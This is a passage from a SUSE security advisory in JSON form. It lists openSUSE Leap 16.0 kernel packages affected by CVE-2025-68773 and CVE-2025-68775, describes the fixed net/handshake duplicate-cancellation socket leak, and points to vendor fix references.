"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
